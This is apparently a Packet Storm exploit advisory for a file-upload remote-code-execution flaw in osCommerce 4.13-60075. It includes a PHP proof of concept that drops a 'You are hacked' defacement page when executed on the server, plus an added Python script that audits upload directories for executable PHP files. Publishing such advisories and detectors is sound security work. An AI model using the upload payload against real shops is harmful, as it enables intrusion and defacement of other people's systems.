## https://sploitus.com/exploit?id=PACKETSTORM:176233
## Title: osCommerce 4.13-60075 File-Upload-RCE  
## Author: nu11secur1ty  
## Date: 12/14/2023  
## Vendor: https://www.oscommerce.com/  
## Software: https://www.oscommerce.com/download-file  
## Reference: https://portswigger.net/web-security/file-upload  
  
  
## Description:  
The parameter "icon-pencil" in the upload-file dz-clickable function
is vulnerable to file upload and remote code execution.
The attacker can easily destroy this system if he is a kracker, grey
hat, or some kind of stupid kid. More:
https://portswigger.net/web-security/file-upload. In this scenario,
I just uploaded a PHP exploit which created a second file directly on
the server, and then I executed it DIRECTLY on the
server, using just a browser. This can be executed with more
methods, but we can talk about it later. =)
  
  
STATUS: CRITICAL Vulnerability  
  
[+]Exploit:  
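```
<?php
// @nu11secur1ty 2023
// Proof of concept: when requested through the web server, this script
// writes a second file (hacked.html) into the directory it runs from.
$myfile = fopen("hacked.html", "w") or die("Unable to open file!");

// First line of the dropped page.
$txt = "<p>You are hacked</p>\n";
fwrite($myfile, $txt);

// Second block of the dropped page, including an external link.
$txt = "<p><p>This is not good for you</p>\n<a href='https://sell.sawbrokers.com/domain/malicious.com/' target='_blank'>You can visit our website for more information!</a></p>\n";
fwrite($myfile, $txt);
fclose($myfile);
?>
```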
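
For defenders, an upload directory can be audited for the condition described above, where a file the PHP handler will execute ends up in a web-served upload path. This is an added example, not code from the advisory or from osCommerce; the directory layout, file names, extension list and the Apache `.htaccess` check are assumptions, and the sample files are constructed.

```python
import tempfile
from pathlib import Path

# Extensions commonly mapped to the PHP handler (assumption: match this to the server config).
PHP_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".pht"}
# Only the long open tag is matched; short tags would false-positive on binary data.
PHP_TAG = b"<?php"


def audit_upload_dir(root, scan_bytes=1 << 20):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        # Check every suffix so "banner.php.jpg" is caught as well as "poc.php".
        suffixes = {s.lower() for s in path.suffixes}
        if suffixes & PHP_EXTS:
            findings.append((rel, "php-extension"))
        elif path.name.lower() == ".htaccess":
            # A per-directory override can map harmless extensions to PHP.
            findings.append((rel, "handler-override"))
        else:
            with path.open("rb") as fh:
                head = fh.read(scan_bytes).lower()
            if PHP_TAG in head:
                findings.append((rel, "php-tag-in-content"))
    return sorted(findings)


def demo():
    """Build a constructed upload tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "icons").mkdir()
        (base / "icons" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
        (base / "icons" / "poc.php").write_bytes(b"<?php fopen('hacked.html','w'); ?>")
        (base / "icons" / "banner.php.jpg").write_bytes(b"\xff\xd8\xff\xe0")
        (base / "icons" / "photo.gif").write_bytes(b"GIF89a<?php echo 1; ?>")
        (base / ".htaccess").write_bytes(b"AddType application/x-httpd-php .gif\n")
        return audit_upload_dir(base)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:20} {rel}")
```

Any finding in a directory that the web server serves and that accepts uploads means the uploaded content can run as code; storing uploads outside the web root or disabling the PHP handler for that directory removes the execution step.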
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oscommerce.com/osCommerce-4.13-60075)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/12/oscommerce-413-60075-file-upload-rce.html)  
  
## Time spent:  
00:15:00